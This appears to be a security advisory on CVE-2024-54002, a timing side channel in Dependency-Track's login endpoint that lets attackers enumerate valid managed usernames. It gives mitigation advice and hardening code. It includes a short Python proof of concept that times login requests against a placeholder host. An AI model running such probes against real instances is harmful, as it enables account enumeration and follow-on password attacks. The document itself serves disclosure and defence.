Dependency-Track (https://dependencytrack.org) is an open-source Component Analysis platform designed to help organizations identify and reduce software supply chain risks. It integrates with other tools such as vulnerability scanners, provides comprehensive visibility of software components and their vulnerabilities, and helps in managing the risk posed by these components. However, a recent vulnerability (CVE-2024-54002) was discovered that enables malicious actors to enumerate valid managed user accounts, making subsequent attacks such as password guessing or social engineering much easier. LDAP and OpenID Connect users are not affected by this vulnerability, and it has been fixed in Dependency-Track version 4.12.2.

Exploit Details

The vulnerability resides in the login process of Dependency-Track, specifically in the /api/v1/user/login endpoint. When a login request is made with a valid, known username, the request takes significantly longer to process than one made with a non-existent username. This observable difference in request duration can be used by malicious actors to enumerate the valid names of managed users and subsequently launch further attacks.

Here is a code snippet that demonstrates the vulnerability:

import requests
import time

base_url = "https://example.com/dependency-track/"
login_endpoint = "api/v1/user/login"

# Try logging in with a non-existent username and time the request
start_time = time.perf_counter()
response = requests.post(base_url + login_endpoint, json={"username": "nonexistent_user", "password": "random_password"})
end_time = time.perf_counter()

print("Non-existent user request duration:", end_time - start_time)

# Try logging in with an existing username and time the request
start_time = time.perf_counter()
response = requests.post(base_url + login_endpoint, json={"username": "existing_user", "password": "random_password"})
end_time = time.perf_counter()

print("Existing user request duration:", end_time - start_time)

In this example, the difference in duration between the nonexistent_user and existing_user requests is noticeable, indicating that existing_user is a valid username on the Dependency-Track instance.

References to Original Sources

1. Dependency-Track Official Website: https://dependencytrack.org
2. Dependency-Track GitHub Repository: https://github.com/DependencyTrack/dependency-track
3. CVE-2024-54002: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54002
4. Dependency-Track 4.12.2 Release Notes: https://github.com/DependencyTrack/dependency-track/releases/tag/4.12.2

Mitigation

To protect against this vulnerability, it is essential to upgrade Dependency-Track to the latest version (4.12.2 or later). This version contains a fix for the CVE-2024-54002 vulnerability, ensuring that malicious actors can no longer enumerate valid usernames based on the observable difference in request duration on the /api/v1/user/login endpoint.
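The general remedy for this class of timing leak, as an added Python example that is not Dependency-Track's own code: a login routine that skips the password hash for unknown users (the behaviour described above) next to one that always spends the same hashing cost, with a call counter showing why the second one gives nothing away. The user store, hash parameters and names are constructed for the demonstration and are not taken from the project.

```python
import hashlib
import hmac
import os
import time

PBKDF2_ITERATIONS = 200_000  # deliberately slow password hash (stdlib only)

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)

# Constructed user store standing in for the managed-user table (hypothetical data)
_salt = os.urandom(16)
USERS = {"alice": (_salt, hash_password("correct horse", _salt))}
# Dummy credential verified for unknown usernames so the slow work is always done
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy-never-accepted", _DUMMY_SALT)
hash_calls = {"count": 0}  # instrumentation: slow hash computations so far

def _verify(password: str, salt: bytes, expected: bytes) -> bool:
    hash_calls["count"] += 1
    return hmac.compare_digest(hash_password(password, salt), expected)

def login_vulnerable(username: str, password: str) -> bool:
    """Returns early for an unknown user: no hash is computed, so the reply is fast."""
    if username not in USERS:
        return False
    salt, expected = USERS[username]
    return _verify(password, salt, expected)

def login_hardened(username: str, password: str) -> bool:
    """Performs exactly one hash verification whether or not the user exists."""
    record = USERS.get(username)
    if record is None:
        _verify(password, _DUMMY_SALT, _DUMMY_HASH)  # same cost, result discarded
        return False
    salt, expected = record
    return _verify(password, salt, expected)

def hashes_performed(login, username: str, password: str) -> int:
    """Number of slow hash computations a single login attempt triggers."""
    before = hash_calls["count"]
    login(username, password)
    return hash_calls["count"] - before

def timing_gap(login) -> float:
    """Seconds by which a known-user attempt outlasts an unknown-user attempt."""
    t0 = time.perf_counter()
    login("nobody", "x")
    t1 = time.perf_counter()
    login("alice", "x")
    return (time.perf_counter() - t1) - (t1 - t0)
```

With the hardened routine an unknown username and a wrong password both cost exactly one hash, so request duration no longer depends on whether the account exists.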

In addition to upgrading Dependency-Track, organizations should also follow best practices for securing the platform, such as using strong, unique passwords for all user accounts, enabling multi-factor authentication, and conducting regular security reviews and audits. By maintaining a robust security posture, organizations can better protect their software supply chain from various threats and vulnerabilities.

Timeline

Published on: 12/04/2024 16:15:26 UTC